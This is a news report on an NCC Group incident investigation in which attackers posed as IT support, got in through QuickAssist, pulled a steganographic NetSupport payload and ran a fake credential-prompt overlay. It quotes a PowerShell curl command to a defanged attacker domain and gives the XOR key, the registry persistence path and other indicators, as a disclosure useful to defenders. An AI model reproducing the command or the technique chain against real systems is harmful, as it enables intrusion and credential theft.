Corporate systems were compromised in under five minutes by cybercriminals leveraging social engineering and PowerShell scripting, according to an investigation conducted by the NCC Group’s Digital Forensics and Incident Response (DFIR) team.
The attackers impersonated internal IT support and contacted approximately twenty employees, ultimately convincing two users to allow remote access via QuickAssist.exe, a legitimate Windows remote assistance tool. Once inside, threat actors initiated an attack chain designed for speed and persistence.
FCRF Launches India’s Premier Certified Data Protection Officer Program Aligned with DPDP Act
QuickAssist Enables Rapid Access and Malicious Payload Execution
Within 300 seconds of entry, the attackers executed a clipboard manipulation command using PowerShell: (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard. This set the stage for the download and deployment of malicious tools embedded via steganography within a JPEG file hosted at hxxps://resutato[.]com/b2/res/nh2.jpg.
The embedded payload, concealed inside the image file, was decrypted using a four-byte XOR key (0x31, 0x67, 0xBE, 0xE1) to reconstruct a ZIP archive. This archive contained components of NetSupport Manager, disguised as benign “NetHealth” software.
Credential Theft and Persistent Access
Post-deployment, attackers established long-term persistence through scheduled tasks and registry entries. These included the use of regsvr32.exe to run randomised DLLs every five minutes and registry manipulation via HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\NETHEALTH.
The malware exploited trusted Windows binaries such as msiexec.exe and GenUp.exe to sideload a malicious libcurl.dllfile.
A particularly alarming feature was the PowerShell-based credential harvesting GUI. This tool, located at C:\Users\{username}\Videos\l.ps1, created a full-screen overlay that mimicked an official system verification dialog. The prompt harvested plaintext user credentials and stored them in $env:TEMP\cred.txt, while disabling system navigation to prevent escape.
Communication with attacker-controlled domains like resutato[.]com and nimbusvaults[.]com provided the adversaries with full remote access and control capabilities.
Security experts warn that the speed and sophistication of the breach highlight the critical need for improved user training and rapid response protocols. Trusted tools, once exploited, can facilitate devastating breaches within minutes.